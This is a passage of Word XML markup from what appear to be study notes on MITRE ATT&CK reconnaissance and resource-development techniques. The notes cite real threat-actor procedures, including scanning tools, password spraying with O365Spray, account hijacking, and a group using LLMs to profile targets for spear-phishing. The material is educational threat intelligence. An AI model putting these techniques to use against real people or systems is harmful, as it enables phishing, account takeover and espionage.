      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00C66C5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="700"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>APT41 used Acunetix to scan for SQL injection flaws in web applications and JexBoss</w:t>
      </w:r>
      <w:r w:rsidR="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find Java vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00C66C5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="700"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Sandworm Team scanned for Citrix and Microsoft Exchange vulnerabilities (e.g., ProxyShell) to </w:t>
      </w:r>
      <w:r w:rsidR="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>exploit public-facing systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00706A2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00C66C5E" w:rsidP="00706A2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:r w:rsidR="00706A2A" w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Gather Victim Identity Information (T1589)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00706A2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Collecting personal/professional details about individuals (e.g., roles, credentia</w:t>
      </w:r>
      <w:r w:rsidR="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>ls) to craft targeted attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00C66C5E" w:rsidP="00706A2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00C66C5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="700"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Kimsuky used LLMs to research employees at think tanks/government agencies, identifying key</w:t>
      </w:r>
      <w:r w:rsidR="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> personnel for spear-phishing</w:t>
      </w:r>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00C66C5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="700"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>APT28 harvested social media and professional networking profiles to</w:t>
      </w:r>
      <w:r w:rsidR="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> impersonate trusted contacts</w:t>
      </w:r>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00706A2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00C66C5E" w:rsidP="00706A2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">3) </w:t>
      </w:r>
      <w:r w:rsidR="00706A2A" w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Search Open Websites/Domains (T1593)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00706A2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Leveraging publicly accessible sites (e.g., social media, news, con</w:t>
      </w:r>
      <w:r w:rsidR="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>tracts) to harvest victim data</w:t>
      </w:r>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00C66C5E" w:rsidP="00706A2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00C66C5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="700"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Kimsuky used LLMs to identify think tanks and government organization</w:t>
      </w:r>
      <w:r w:rsidR="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>s holding valuable policy data</w:t>
      </w:r>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A2A" w:rsidRPr="00C66C5E" w:rsidRDefault="00706A2A" w:rsidP="00C66C5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="700"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Sandworm Team queried Ukraine’s EDRPOU database (legal entity registry) to gather entity ident</w:t>
      </w:r>
      <w:r w:rsidR="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>ifiers for the NotPetya attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00C66C5E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F34F9E" w:rsidRPr="007C303B" w:rsidRDefault="00F34F9E" w:rsidP="007C303B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00264887" w:rsidRPr="00C66C5E" w:rsidRDefault="00264887" w:rsidP="00A5741B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Resource Development</w:t>
      </w:r>
      <w:r w:rsidR="00773F95">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00773F95" w:rsidRPr="00773F95">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Tactic (TA0042)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C66C5E" w:rsidRDefault="00A5741B" w:rsidP="00C66C5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A5741B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition: Adversaries acquire, prepare, and position resources before executing attacks. This includes compromising infrastructure, stealing accounts, obtaining malware, and staging malicious content to enable follow-on operations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A5741B" w:rsidRDefault="00A5741B" w:rsidP="00C66C5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="00886717">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="6237"/>
        </w:tabs>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Technique: Compromise Accounts (T1586)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRDefault="007C303B" w:rsidP="002E0B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>It means</w:t>
      </w:r>
      <w:r w:rsidR="002E0B92" w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hijack legitimate user accounts (e.g., email, cloud, social media) to blend in with normal traffic and evade detection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C303B" w:rsidRPr="002E0B92" w:rsidRDefault="007C303B" w:rsidP="002E0B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="007C303B" w:rsidRDefault="002E0B92" w:rsidP="002E0B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C303B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Sub-technique: Compromise Email Account (T1586.002)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="007C303B" w:rsidP="002E0B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Because </w:t>
      </w:r>
      <w:r w:rsidR="002E0B92" w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Email accounts enable spear-phishing, credential theft, and lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="007C303B" w:rsidRDefault="002E0B92" w:rsidP="002E0B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C303B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="007C303B" w:rsidRDefault="002E0B92" w:rsidP="007C303B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C303B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Credential Phishing via Compromised Legitimate Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="007C303B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Use already-hijacked accounts to send phishing emails from trusted sources (e.g., colleagues, vendors).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="007C303B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Real-World Example: APT28 (Fancy Bear) compromised Microsoft 365 accounts of government employees, then sent malicious links to diplomatic contacts, bypassing email security.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="007C303B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Impact: Higher success rate (recipients trust familiar senders).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="007C303B" w:rsidRDefault="002E0B92" w:rsidP="007C303B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C303B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Account Takeover via Password Spraying</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="007C303B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Target weak passwords across multiple accounts (e.g., Password123).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="007C303B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Tools: Tools like O365Spray test credentials against Office 365.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="007C303B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Real-World Example: Iranian group TA453 used password spraying to hijack academic email accounts for espionage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="007C303B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Impact: Access to sensitive communications and contacts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="007C303B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="007C303B" w:rsidRDefault="007C303B" w:rsidP="002E0B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C303B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2)</w:t>
      </w:r>
      <w:r w:rsidR="002E0B92" w:rsidRPr="007C303B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Technique: Obtain Capabilities (T1588)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="002E0B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Acquire tools/services (malware, exploits) to enable attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C303B" w:rsidRDefault="007C303B" w:rsidP="002E0B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="007C303B" w:rsidRDefault="002E0B92" w:rsidP="002E0B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C303B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Sub-technique: Obtain Malware (T1588.001)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="007C303B" w:rsidP="002E0B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Because </w:t>
      </w:r>
      <w:r w:rsidR="002E0B92" w:rsidRPr="002E0B92">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Off-the-shelf malware reduces development time and leverages proven evasion techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="007C303B" w:rsidRDefault="002E0B92" w:rsidP="002E0B92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C303B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="007C303B" w:rsidRDefault="002E0B92" w:rsidP="007C303B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C303B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Purchase from Malware-as-a-Service (MaaS) Markets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0B92" w:rsidRPr="002E0B92" w:rsidRDefault="002E0B92" w:rsidP="007C303B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1154"/>
